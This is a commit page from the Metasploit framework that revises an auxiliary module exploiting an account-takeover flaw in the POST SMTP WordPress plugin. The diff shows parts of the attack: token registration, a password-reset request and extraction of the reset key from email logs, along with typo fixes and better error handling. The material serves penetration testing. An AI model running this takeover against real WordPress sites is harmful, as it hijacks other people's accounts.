wp_post_smtp_acct_takeover peer review

h00die · Nov 3, 2024 · 2b593bc · 2b593bc
1 parent 65efd07
commit 2b593bc
Show file tree

Hide file tree

Showing 3 changed files with 10 additions and 8 deletions.
diff --git a/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md b/documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
@@ -1,10 +1,10 @@
 ## Vulnerable Application
 
-POST SMTP, a WordPress plugin,
+The POST SMTP WordPress plugin
 prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
 user is able to reset the password of an arbitrary user. This is done by
 requesting a password reset, then viewing the latest email logs to find
-the associated passowrd reset email.
+the associated password reset email.
 
 ### Install
 

diff --git a/lib/msf/core/exploit/remote/http/wordpress/users.rb b/lib/msf/core/exploit/remote/http/wordpress/users.rb
@@ -74,8 +74,7 @@ def reset_user_password(user)
       'vars_get' => { 'action' => 'lostpassword' },
       'vars_post' => { 'user_login' => user, 'redirect_to' => '', 'wp-submit' => 'Get New Password' }
     })
-    return false if res.nil?
-    return false unless res.code == 200
+    return false unless res&.code == 200
 
     true
   end

diff --git a/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb b/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb
@@ -13,11 +13,11 @@ def initialize(info = {})
         info,
         'Name' => 'Wordpress POST SMTP Account Takeover',
         'Description' => %q{
-          POST SMTP, a WordPress plugin,
+          The POST SMTP WordPress plugin
           prior to 2.8.7 is affected by a privilege escalation where an unauthenticated
           user is able to reset the password of an arbitrary user. This is done by
           requesting a password reset, then viewing the latest email logs to find
-          the associated passowrd reset email.
+          the associated password reset email.
         },
         'Author' => [
           'h00die', # msf module
@@ -55,7 +55,9 @@ def register_token
       'headers' => { 'fcm-token' => token, 'device' => device }
     )
     fail_with(Failure::Unreachable, 'Connection failed') unless res
-    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200 # 404 if the URL structure is wonky, 401 not vulnerable
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response, likely not vulnerable') if res.code == 401
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response, likely unpredicted URL structure') if res.code == 404
+    fail_with(Failure::UnexpectedReply, 'Request Failed to return a successful response') unless res.code == 200
     print_good("Succesfully created token: #{token}")
     return token, device
   end
@@ -107,7 +109,8 @@ def run
     )
     print_good("Full text of log saved to: #{path}")
     # https://rubular.com/r/DDQpKElcH42Qxg
-    if res.body =~ /(^.*key=.+$)/
+    # example URL http://127.0.0.1:5555/wp-login.php?action=rp&key=vy0MNNZZeykpDMArmJgu&login=admin&wp_lang=en_US
+    if res.body =~ /^(.*key=.+)$/
       print_good("Reset URL: #{::Regexp.last_match(1)}")
       return
     end